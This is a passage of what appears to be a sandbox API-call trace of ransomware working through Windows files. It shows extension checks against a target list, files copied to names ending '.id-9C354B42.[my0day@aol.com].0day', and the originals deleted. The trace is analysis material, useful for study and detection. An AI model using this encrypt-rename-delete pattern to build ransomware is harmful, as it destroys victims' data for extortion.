(lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.017] lstrlenW (lpString=".1cd") returned 4 [0036.017] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.017] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0036.017] lstrlenW (lpString=".jpg") returned 4 [0036.017] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.017] lstrcmpiW (lpString1=".EPS", lpString2=".0day") returned 1 [0036.017] lstrlenW (lpString="MS.EPS") returned 6 [0036.017] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.494] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=15067) returned 1 [0036.494] CloseHandle (hObject=0x1c0) returned 1 [0036.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 0x20 [0036.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.494] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0036.494] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.494] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.494] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0036.495] GetLastError () returned 0x0 [0036.495] ReadFile (in: hFile=0x1c0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x3adb, lpOverlapped=0x0) returned 1 [0036.496] WriteFile (in: hFile=0x1bc, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x3ae0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x3ae0, lpOverlapped=0x0) returned 1 [0036.497] ReadFile (in: hFile=0x1c0, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.497] WriteFile (in: hFile=0x1bc, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0036.497] SetEndOfFile (hFile=0x1bc) returned 1 [0036.497] CloseHandle (hObject=0x1bc) returned 1 [0036.498] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.498] SetEndOfFile (hFile=0x1c0) returned 1 [0036.499] CloseHandle (hObject=0x1c0) returned 1 [0036.499] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0036.499] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 1 [0036.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.500] lstrlenW (lpString=".doc") returned 4 [0036.500] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1 [0036.500] lstrlenW (lpString=".docx") returned 5 [0036.500] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1 [0036.500] lstrlenW (lpString=".pdf") returned 4 [0036.500] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1 [0036.500] lstrlenW (lpString=".xls") returned 4 [0036.500] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1 [0036.500] lstrlenW (lpString=".xlsx") returned 5 [0036.500] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1 [0036.500] lstrlenW (lpString=".ppt") returned 4 [0036.500] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1 [0036.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.500] lstrlenW (lpString=".zip") returned 4 [0036.500] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1 [0036.500] lstrlenW (lpString=".rar") returned 4 [0036.500] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1 [0036.500] lstrlenW (lpString=".bz2") returned 4 [0036.500] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1 [0036.500] lstrlenW (lpString=".7z") returned 3 [0036.500] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1 [0036.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.500] lstrlenW (lpString=".dbf") returned 4 [0036.500] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1 [0036.500] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.500] lstrlenW (lpString=".1cd") returned 4 [0036.500] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1 [0036.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.501] lstrlenW (lpString=".jpg") returned 4 [0036.501] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1 [0036.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.501] lstrlenW (lpString=".doc") returned 4 [0036.501] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1 [0036.501] lstrlenW (lpString=".docx") returned 5 [0036.501] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1 [0036.501] lstrlenW (lpString=".pdf") returned 4 [0036.501] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1 [0036.501] lstrlenW (lpString=".xls") returned 4 [0036.501] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1 [0036.501] lstrlenW (lpString=".xlsx") returned 5 [0036.501] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1 [0036.501] lstrlenW (lpString=".ppt") returned 4 [0036.501] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1 [0036.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.501] lstrlenW (lpString=".zip") returned 4 [0036.501] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1 [0036.501] lstrlenW (lpString=".rar") returned 4 [0036.501] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1 [0036.501] lstrlenW (lpString=".bz2") returned 4 [0036.501] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1 [0036.501] lstrlenW (lpString=".7z") returned 3 [0036.501] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1 [0036.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.501] lstrlenW (lpString=".dbf") returned 4 [0036.501] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1 [0036.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.501] lstrlenW (lpString=".1cd") returned 4 [0036.501] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1 [0036.501] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0036.501] lstrlenW (lpString=".jpg") returned 4 [0036.502] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1 [0036.502] lstrcmpiW (lpString1=".JPG", lpString2=".0day") returned 1 [0036.502] lstrlenW (lpString="MS.JPG") returned 6 [0036.502] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0036.936] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1061) returned 1 [0036.936] CloseHandle (hObject=0x1c4) returned 1 [0036.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 0x20 [0036.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0036.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0036.936] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.936] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0036.937] GetLastError () returned 0x0 [0036.937] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x425, lpOverlapped=0x0) returned 1 [0037.017] WriteFile (in: hFile=0x170, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x430, lpOverlapped=0x0) returned 1 [0037.018] ReadFile (in: hFile=0x1c4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.018] WriteFile (in: hFile=0x170, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0037.018] SetEndOfFile (hFile=0x170) returned 1 [0037.018] CloseHandle (hObject=0x170) returned 1 [0037.019] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.019] SetEndOfFile (hFile=0x1c4) returned 1 [0037.020] CloseHandle (hObject=0x1c4) returned 1 [0037.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0037.020] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 1 [0037.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.021] lstrlenW (lpString=".doc") returned 4 [0037.021] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0037.021] lstrlenW (lpString=".docx") returned 5 [0037.021] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1 [0037.021] lstrlenW (lpString=".pdf") returned 4 [0037.021] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0037.021] lstrlenW (lpString=".xls") returned 4 [0037.021] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0037.021] lstrlenW (lpString=".xlsx") returned 5 [0037.021] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1 [0037.021] lstrlenW (lpString=".ppt") returned 4 [0037.021] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0037.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.021] lstrlenW (lpString=".zip") returned 4 [0037.021] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0037.021] lstrlenW (lpString=".rar") returned 4 [0037.021] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0037.021] lstrlenW (lpString=".bz2") returned 4 [0037.021] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0037.021] lstrlenW (lpString=".7z") returned 3 [0037.021] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0037.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.021] lstrlenW (lpString=".dbf") returned 4 [0037.021] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0037.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.021] lstrlenW (lpString=".1cd") returned 4 [0037.021] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0037.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.021] lstrlenW (lpString=".jpg") returned 4 [0037.021] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0037.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.021] lstrlenW (lpString=".doc") returned 4 [0037.021] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0037.022] lstrlenW (lpString=".docx") returned 5 [0037.022] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1 [0037.022] lstrlenW (lpString=".pdf") returned 4 [0037.022] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0037.022] lstrlenW (lpString=".xls") returned 4 [0037.022] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0037.022] lstrlenW (lpString=".xlsx") returned 5 [0037.022] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1 [0037.022] lstrlenW (lpString=".ppt") returned 4 [0037.022] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0037.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.022] lstrlenW (lpString=".zip") returned 4 [0037.022] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0037.022] lstrlenW (lpString=".rar") returned 4 [0037.022] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0037.022] lstrlenW (lpString=".bz2") returned 4 [0037.022] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0037.022] lstrlenW (lpString=".7z") returned 3 [0037.022] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0037.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.022] lstrlenW (lpString=".dbf") returned 4 [0037.022] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0037.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.022] lstrlenW (lpString=".1cd") returned 4 [0037.022] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0037.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0037.022] lstrlenW (lpString=".jpg") returned 4 [0037.022] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0037.022] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0037.022] lstrlenW (lpString="ipsnld.xml") returned 10 [0037.023] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.050] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2626) returned 1 [0037.050] CloseHandle (hObject=0x1c4) returned 1 [0037.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml")) returned 0x20 [0037.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.050] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.050] lstrlenW (lpString=".doc") returned 4 [0037.051] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString=".docx") returned 5 [0037.051] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0037.051] lstrlenW (lpString=".pdf") returned 4 [0037.051] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString=".xls") returned 4 [0037.051] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString=".xlsx") returned 5 [0037.051] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0037.051] lstrlenW (lpString=".ppt") returned 4 [0037.051] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.051] lstrlenW (lpString=".zip") returned 4 [0037.051] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.051] lstrlenW (lpString=".rar") returned 4 [0037.051] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString=".bz2") returned 4 [0037.051] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString=".7z") returned 3 [0037.051] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.051] lstrlenW (lpString=".dbf") returned 4 [0037.051] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.051] lstrlenW (lpString=".1cd") returned 4 [0037.051] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.051] lstrlenW (lpString=".jpg") returned 4 [0037.051] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.051] lstrlenW (lpString=".doc") returned 4 [0037.051] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString=".docx") returned 5 [0037.052] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0037.052] lstrlenW (lpString=".pdf") returned 4 [0037.052] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString=".xls") returned 4 [0037.052] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString=".xlsx") returned 5 [0037.052] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0037.052] lstrlenW (lpString=".ppt") returned 4 [0037.052] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.052] lstrlenW (lpString=".zip") returned 4 [0037.052] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.052] lstrlenW (lpString=".rar") returned 4 [0037.052] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString=".bz2") returned 4 [0037.052] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString=".7z") returned 3 [0037.052] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.052] lstrlenW (lpString=".dbf") returned 4 [0037.052] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.052] lstrlenW (lpString=".1cd") returned 4 [0037.052] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0037.052] lstrlenW (lpString=".jpg") returned 4 [0037.052] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.052] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0037.052] lstrlenW (lpString="ipsptb.xml") returned 10 [0037.052] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.053] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2246) returned 1 [0037.053] CloseHandle (hObject=0x1c4) returned 1 [0037.054] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml")) returned 0x20 [0037.054] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0037.054] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0037.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.054] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.055] lstrlenW (lpString=".doc") returned 4 [0037.055] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.055] lstrlenW (lpString=".docx") returned 5 [0037.055] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0037.055] lstrlenW (lpString=".pdf") returned 4 [0037.055] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.055] lstrlenW (lpString=".xls") returned 4 [0037.055] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.055] lstrlenW (lpString=".xlsx") returned 5 [0037.055] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0037.055] lstrlenW (lpString=".ppt") returned 4 [0037.055] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.055] lstrlenW (lpString=".zip") returned 4 [0037.055] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.055] lstrlenW (lpString=".rar") returned 4 [0037.055] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.055] lstrlenW (lpString=".bz2") returned 4 [0037.055] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.055] lstrlenW (lpString=".7z") returned 3 [0037.055] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.055] lstrlenW (lpString=".dbf") returned 4 [0037.055] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.055] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned 61 [0037.055] lstrlenW (lpString=".1cd") returned 4 [0037.055] lstrcmpiW (lpString1=".1cd", 